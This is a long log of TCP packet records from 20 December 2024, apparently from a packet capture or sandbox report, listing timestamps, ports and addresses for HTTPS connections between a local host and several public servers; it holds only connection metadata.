                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.288719893 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.288830042 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.288917065 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.288942099 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.288952112 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.289032936 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.289742947 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.289897919 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.289964914 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.289975882 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.336863041 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.337032080 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.337086916 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.337106943 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.339848995 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.339983940 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.339996099 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.340168953 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.340224028 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.340248108 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.348248959 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.348299980 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.348323107 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.348505974 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.348551989 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.348575115 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.356686115 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.356750011 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.356771946 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.356888056 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.356945992 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.356952906 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.365072012 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.365128994 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.365480900 CET49741443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.365497112 CET44349741192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.373699903 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.373759985 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.373769045 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382246017 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382337093 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382353067 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382757902 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382796049 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382874966 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.383093119 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.383110046 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.390413046 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.390522003 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.390526056 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.390558004 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.390753031 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.398500919 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.407155991 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.407226086 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.407234907 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.419498920 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.419610023 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.419635057 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.419682026 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.419913054 CET49744443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.419926882 CET44349744192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.431077957 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.431117058 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.431210995 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.431514978 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.431529999 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.432128906 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.432189941 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.432262897 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.432631016 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.432650089 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.434068918 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.434093952 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.434329987 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.434557915 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.434571981 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.463366985 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.463404894 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.463510990 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.463762045 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.463777065 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479015112 CET49756443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479090929 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479172945 CET49756443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479861021 CET49756443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479897022 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556370020 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556503057 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556590080 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556596994 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556619883 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556771994 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556792974 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.556803942 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.557005882 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.557073116 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.557081938 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.557140112 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.565475941 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.574276924 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.574296951 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.574404955 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.574721098 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.574733019 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.576803923 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.576951027 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.576968908 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.625036001 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.625058889 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.656325102 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.656369925 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.656450987 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.656671047 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.656687021 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.670310974 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.676572084 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.716499090 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.755980968 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.759995937 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.760072947 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.760092974 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.771106958 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.771198034 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.771250010 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.771275043 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.771333933 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.778609991 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.786968946 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.787045002 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.787061930 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.794183016 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.794275999 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.794291973 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.801779032 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.801857948 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.801872969 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.817629099 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.817688942 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.817738056 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.817756891 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.817881107 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.824141979 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.830405951 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.830521107 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.830538988 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837006092 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837078094 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837097883 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837115049 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837189913 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837522984 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.837537050 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.988718987 CET49760443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.988764048 CET44349760192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.988847017 CET49760443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.989132881 CET49760443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.989151001 CET44349760192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.595720053 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.596143007 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.596165895 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.597193003 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.597249985 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.597764969 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.597824097 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.598141909 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.598148108 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.639307976 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.643990993 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.644301891 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.644330978 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.644864082 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.645225048 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.645273924 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.645313025 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.645556927 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.645595074 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.645683050 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.646002054 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.646339893 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.646416903 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.646459103 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.646485090 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.648483992 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.648709059 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.648741007 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.649849892 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.650589943 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.650769949 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.650814056 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.687382936 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.691339970 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.693053007 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.693551064 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.693567038 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.693912029 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.694118977 CET49756443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.694189072 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.695022106 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.695092916 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.695410967 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.696309090 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.696413040 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.696989059 CET49756443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.697179079 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.697487116 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.697494984 CET44349755192.0.73.2192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.697639942 CET49756443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.700390100 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.743362904 CET44349756192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.746948957 CET49755443192.168.2.11192.0.73.2
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.788042068 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.788288116 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.788320065 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.789371014 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.789434910 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.790492058 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.790553093 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.790771008 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.790780067 CET44349758192.0.76.3192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.842012882 CET49758443192.168.2.11192.0.76.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.880031109 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.880357027 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.880378008 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.881438971 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.881501913 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.882575035 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.882648945 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.882747889 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.923243046 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.923253059 CET44349759192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:34.968034983 CET49759443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.036577940 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.036706924 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.036912918 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.037101030 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.037873983 CET49751443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.037897110 CET44349751192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084417105 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084471941 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084566116 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084594011 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084723949 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084762096 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084800959 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084814072 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084820986 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.084846973 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086014032 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086157084 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086253881 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086318970 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086349964 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086750031 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086802959 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086812019 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086848021 CET49753443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.086858034 CET44349753192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090488911 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090575933 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090769053 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090816021 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090825081 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090841055 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090856075 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090893030 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.090992928 CET49754443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.091000080 CET44349754192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.092674017 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.092747927 CET49752443192.168.2.11192.0.77.32
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.092761040 CET44349752192.0.77.32192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:35.094419956 CET44349753192.0.77.32192.168.2.11
